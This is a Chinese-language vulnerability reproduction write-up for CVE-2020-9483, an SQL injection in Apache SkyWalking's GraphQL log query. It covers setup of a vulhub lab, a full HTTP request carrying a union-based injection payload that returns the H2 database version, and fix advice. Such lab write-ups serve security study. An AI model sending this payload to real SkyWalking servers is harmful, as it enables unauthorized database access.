(CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现
漏洞信息
漏洞名称
ApacheSkyWalking SQL注入漏洞
漏洞编号
CVE-2020-9483
危害等级
高危
漏洞类型
通用型漏洞
漏洞厂商
Apache
漏洞概述
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
环境搭建
先在kali安装docker-compose
然后下载靶场vulhub:
docker-compose up -d
生成靶场环境:
访问8080端口:
环境搭建完成。
漏洞复现
利用burpsuite抓包:
BP抓包,利用报错注入获取版本
POST /graphql HTTP/1.1
Host: 192.168.18.149:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 610
Origin: http://192.168.18.149:8080
Connection: close
Referer: http://192.168.18.149:8080/
{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}
}
","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}
}
成功返回h2数据库版本信息!
修复建议
1、升级Apache Skywalking 到最新的 v8.4.0 版本。
2、将默认h2数据库替换为其它支持的数据库。
(CVE-2020-9483)ApacheSkyWalking SQL注入 漏洞复现相关推荐
- kkcms前台sql注入漏洞复现
kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...
- espcms5.7.13 sql注入漏洞复现
espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...
- 通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...
- 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现
漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...
- 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)
0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...
- 畅捷通T+ SQL注入漏洞复现(QVD-2023-13612)
0x01 产品简介 畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理.采购管理.库存管理等.主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化.移动化.物联网.电子 ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...
- 泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)
0x01 产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型 ...
最新文章
- 滴滴叶杰平:年运送乘客百亿次,AI如何“服务”出行领域?| BDTC 2019
- Matlab问题汇总!
- Cydia for Android2
- 5u fb库 三菱plc_三菱FX5U PLC入门必备基础知识特点
- 2020 我的C++的学习之路 第十章 对象和类
- 教育|施一公:研究生最重要的素质是什么?
- 八皇后问题--C语言学习笔记
- When we first heard of Linux
- php数字转千分制,JS实现金额千分制的转换以及还原
- 小程序短视频项目———视频详情页面开发(二)
- 系统设计---分层,分级,分块
- 冲着名为Sundy的男人去麦子学院
- html开始游戏如何打开,dnf游戏进不去 点击开始-运行,输入CMD
- JavaScript页面跳转并传参的常用方法
- java基础_设计模式_设计基础(小鸭子游戏)
- 【音视频开发】基础知识:视频简介
- 从表征到行动---意向性的自然主义进路(续六)
- 用Excel为人生铺路,走向希望的彼岸
- nCode:DesignLife案例教程十一
- 刚刚出新的Kubernetes 却曝出了“高危”安全漏洞;亚马逊将推免费新闻视频服务,对标苹果 | 极客头条...
热门文章
- 由玫琳凯赞助的NFTE世界创新系列赛挑战赛公布致力于解决全球问题的青年获胜者
- 三星Gear VR与Oculus Rift DK2全方位比拼
- web开发(九) 使用javamail进行发送邮件,(使用QQ,163,新浪邮箱服务器)
- mac上的一款超级强大的文件管理工具Forklift
- 通过xsd校验xml
- C++ QT结合FFmpeg实战开发视频播放器-09项目资源和UI加载的流程
- 十五分钟实现Google Talk客户端(附例子)
- java带参数的构造方法_简单了解JAVA构造方法
- java assembly_java – maven-assembly-plugin:如何使用appendAssemblyId
- android lib 界面库,全开源C++ DirectUI 界面库SOUI 3.0更新